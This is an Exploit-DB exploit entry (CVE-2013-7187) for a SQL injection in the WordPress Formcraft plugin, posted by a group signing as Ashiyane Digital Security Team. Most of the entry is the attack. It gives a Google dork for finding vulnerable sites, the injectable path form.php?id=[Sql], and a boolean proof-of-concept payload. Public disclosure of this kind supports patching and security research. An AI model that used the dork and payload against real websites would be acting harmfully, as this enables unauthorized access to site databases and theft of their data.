WordPress Formcraft Plugin - SQL Injection Vulnerability

2013-12-02T00:00:00
ID EDB-ID:30002
Type exploitdb
Reporter Ashiyane Digital Security Team
Modified 2013-12-02T00:00:00

Description

Wordpress Formcraft Plugin - SQL Injection Vulnerability. CVE-2013-7187. Webapps exploit for php platform

                                        
                                            #######################################################################
# Exploit Title : Wordpress formcraft Plugin Sql Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork : inurl:/wp-content/plugins/formcraft
#
# Software Link : www.wordpress.org
#
# Tested on: Windows , Linux
#
# Date: 2013/12/2
#
#############################################
# Exploit : Sql Injection
#
# Location1:
[Target]/wp-content/plugins/formcraft/form.php?id=[Sql]
#
#
#
# Exploit-DB Note:
# A PoC: form.php?id=1%20and%20 1=1
##########################################

##############
Milad Hacking

We Love Mohammad
##############